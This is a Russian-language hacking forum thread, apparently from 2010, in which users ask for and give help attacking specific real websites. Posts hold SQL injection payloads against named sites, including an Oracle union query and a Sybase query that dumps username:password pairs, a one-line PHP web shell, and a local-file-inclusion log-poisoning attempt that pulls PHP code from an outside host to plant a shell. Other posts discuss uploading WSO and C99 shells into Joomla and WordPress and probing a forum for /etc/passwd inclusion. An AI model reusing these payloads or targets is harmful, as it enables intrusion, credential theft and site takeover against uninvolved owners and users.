Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,255
    Likes Received:
    1,147
    Reputations:
    886
    почти всегда есть доступ к msysaccessobjects :)
     
    _________________________
  2. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Я имел ввиду то, что FlaktW наверняка захочет заполучить юзеров, и что ему для этого придется либо искать данные об этой таблице в ошибке, либо подбирать вручную))

    З.ы - а для раскрутки скули да, msysaccessobjects - идеальный вариант)
     
  3. YupiSan

    YupiSan New Member

    Joined:
    2 Sep 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Подскажите плиз, в джумле не загружается ни WSO2.4 ни BOFF1.0, пробывал и загружать, пробовал и код ихний вставлять в новосозданный документ, не помогло.
    работает только C99madShell....
    что это может быть????

    сорри если не там написал
     
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,549
    Likes Received:
    1,244
    Reputations:
    273
    всо некодированный залей...
     
  5. YupiSan

    YupiSan New Member

    Joined:
    2 Sep 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    1. подскажите где его взять?
    2. что с ним дальше делать?
    3. из-за чего это такое происходит на сайта?

    wordpress ведет себя аналочитно....
     
    #15425 YupiSan, 20 Nov 2010
    Last edited: 20 Nov 2010
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,549
    Likes Received:
    1,244
    Reputations:
    273
    C99madShell отличный шелл....вообще <? system($_GET[cmd]); ?> шелл который работает везде...
    как сказал Redwood не везде..так что извиняюсь...99% будет работать
     
    #15426 Gorev, 20 Nov 2010
    Last edited: 20 Nov 2010
    2 people like this.
  7. YupiSan

    YupiSan New Member

    Joined:
    2 Sep 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    становится все интересней:
    на старых шеллах ВСО тоже не работает, пишет что нету такого файла, а он та есть!!!
    что можно сделать, другие шеллы ВСО на совместных сайтах норма работают...
    что за мистика такая????
     
  8. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Перебрал все параметры на сайте, но вывода не добился. Не могли бы вы написать в каких параметрах, есть вывод?
     
  9. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Code:
    http://calidad.com.au/prFullRange.asp?MAN=HP
    Вот тут, например, есть вывод)
    Но чтобы его добиться, придется немного поработать мозгом)
     
    2 people like this.
  10. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Не получается вывести. Не могли бы вы сообщите, каким запросом можно получить вывод?
     
  11. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    418
    Likes Received:
    46
    Reputations:
    40
    как в sybase узнать общее количество записи, типа limit? или использовать только not in.

    http://www.site.com/index.html?id=-4+or+1=convert(numeric,(select+max(convert(varchar,username)||0x3a||password)+from+database..table))/**/

    мне нужно узнать общее количетсво связки username:password
     
  12. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Здесь есть скуля?


    http://www.airportdriver.at/index.php?id=21&lang=en'
     
  13. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    нет.
     
    1 person likes this.
  14. ALIM

    ALIM Member

    Joined:
    20 Apr 2010
    Messages:
    60
    Likes Received:
    6
    Reputations:
    5
    http://xxx.com/index.php?id=<?php include("http://123.narod.ru/list.php"); ?>
    Делаю такой запрос ч-з адресную строку

    Перехожу:
    http://xxx.com/index.php?id=../../../../../../../../../../../../../../../var/log/httpd/error_log%00
    в логах

    [Mon Nov 22 16:10:39 2010] [error] [client 222.222.222.222] File does not exist: /home/hgjhgjhgjhgjhg/favicon.ico, referer: http://xxx.com/index.php?id=%3C?php%20include(%22http://123.narod.ru/list.php%22);%20?%3E%00 [Mon Nov 22 16:10:41 2010] [error]

    т.е. не пишется что он передался ч-з гет. хотя другие записи с гет есть.
    access_log огромных размеров но в вверху вообще нет записей моего ip.

    Ч-з какую прогу можно отправить правильный запрос чтобы залить шелл(inetcrack или аналоги) help plz
     
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,255
    Likes Received:
    1,147
    Reputations:
    886
    2 ALIM

    смотри в акцесс_лог е, должно запысыватся USER_AGENT

    если есть, то через тампер дату легко залить
     
    _________________________
    3 people like this.
  16. ALIM

    ALIM Member

    Joined:
    20 Apr 2010
    Messages:
    60
    Likes Received:
    6
    Reputations:
    5
    Да сейчас посмотрел есть юзер-агент, спасибо)
     
  17. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Здесь возможно обойти фильтрацию?

    http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+asdunionasdselectasd+1,2,3,4,5,6,7,8,9,10,11,12+--+
     
  18. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    это оракл:
    http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+and+1=0+union+select+1111,null,null,null,null,null,null,null,null,null,null,null+from+sys.dual--
    вывод в верхнем меню, где deutsch:
    href="/oeaw_servlet/PersonenDetailsGeneric?id=1111"

    с ораклом не сталкивался, поэтому как дальше крутить пока не могу подсказать
     
    5 people like this.
  19. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Thanks! и +++++++++++
     
  20. SHiNiGaMi

    SHiNiGaMi Banned

    Joined:
    3 Jan 2010
    Messages:
    382
    Likes Received:
    55
    Reputations:
    15
    забрел на форум avira, оказался на ссылке http://forum.avira.com/wbb/index.php?page=LegalNotice, подставив вместо LegalNotice index, я вышел на index.php, т. е. http://forum.avira.com/wbb/index.php == http://forum.avira.com/wbb/index.php?page=index
    является ли это инклудом(пытался другие страницы, /etc/passwd%00 и т.д., пишет, что страница не найдена)?
     
Loading...
Thread Status:
Not open for further replies.